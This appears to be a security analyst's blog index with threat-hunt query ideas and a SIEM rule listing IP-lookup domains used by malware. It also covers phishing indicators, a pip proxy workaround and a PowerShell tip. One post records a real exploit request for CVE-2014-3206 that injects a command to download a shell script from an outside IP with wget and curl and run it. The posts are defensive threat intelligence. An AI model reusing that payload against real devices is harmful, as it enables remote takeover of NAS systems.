Friday, September 10, 2021

Threat Hunt - Proxy Phishing from HTML attachment

 proxy #threathunt idea:

where urlpath = '/next.php' and method = 'POST' and referrer is null cred #phishing 9/10/21 Sharepoint Theme sbj: notification 1 new FAX from: mout.kundenserver[.de 212.227.126.134 HTML attachment posts stolen creds to gms4372.nelrg[.com/gfkn/next.php
Posted by at 7 comments:
Labels: ,

Threat Hunt - Proxy C2 IP with PHP

potential proxy #threathunt idea

post or put to urls that contain ip address and php

where
domain matches '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'
and
method in ('POST', 'PUT')
and
urlpath endswith '.php'

https://app.any.run/tasks/7f60bc17-b518-4a4a-8455-14b893b53104/
Posted by at 6 comments:
Labels: ,

Siem Rule - IP Lookup Service

 Malware IP lookup service #siem detection rule idea


dns request in:

 - canireachthe.net

 - ipv4.icanhazip.com

 - ip.anysrc.net

 - edns.ip-api.com

 - wtfismyip.com

 - checkip.dyndns.org

 - api.2ip.ua

 - icanhazip.com

 - api.ipify.org

 - ip-api.com

 - checkip.amazonaws.com

 - ipecho.net

 - ipinfo.io

 - ipv4bot.whatismyipaddress.com

 - freegeoip.app

 

imagename not in 

 - brave.exe

 - iexplore.exe

 - opera.exe

 - firefox.exe

 - msedge.exe

 - chrome.exe

 - vivaldi.exe


Posted by at 4 comments:
Labels: ,

Wednesday, August 18, 2021

CVE-2014-3206 Seagate NAS RCE

CVE-2014-3206 Seagate NAS RCE

Seen August 7th, 2021 exploiting by 155.4.223[.]53


GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolol.sh

https://www.exploit-db.com/exploits/33159




Posted by at 22 comments:

CVE-2020-7796 SSRF Zimbra

 Sample exploit attempt of

"CVE-2020-7796" -> cve.mitre.org/cgi-bin/cvenam "...Potential for SSRF if WebEx zimlet installed and zimlet JSP enabled..." -> wiki.zimbra.com/wiki/Zimbra_Re Vuln Details -> github.com/Zimbra/zm-ziml Seen this week from 103.138.125[.]199 #CVE20207796



Posted by at 7 comments:

Monday, June 7, 2021

Python PIP Upgrade or Install Fails : SSL: CERTIFICATE_VERIFY_FAILED behind Proxy

If you're behind a proxy or getting these errors when installing or upgrading python packages or PIP itself

python -m pip install --upgrade pip

WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1123)'))': /simple/pip/


Then try these extra parameters to trust Python sites (only do this if you trust the proxy)

python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org --upgrade pip

Collecting pip

  Downloading pip-21.1.2-py3-none-any.whl (1.5 MB)

     |████████████████████████████████| 1.5 MB 1.3 MB/s

Posted by at 9 comments:

Friday, June 4, 2021

Windows Event TimeGenerated TimeWritten Date Conversion Powershell

In windows event logs if you see


TimeGenerated=1622614277	TimeWritten=1622614277


and want the actual time use the .NET/powershell code


[timezone]::CurrentTimeZone.ToLocalTime(([datetime]'1/1/1970').AddSeconds("1622614277"))


Wednesday, June 2, 2021 1:11:17 AM

Posted by at 7 comments:
Subscribe to: Posts (Atom)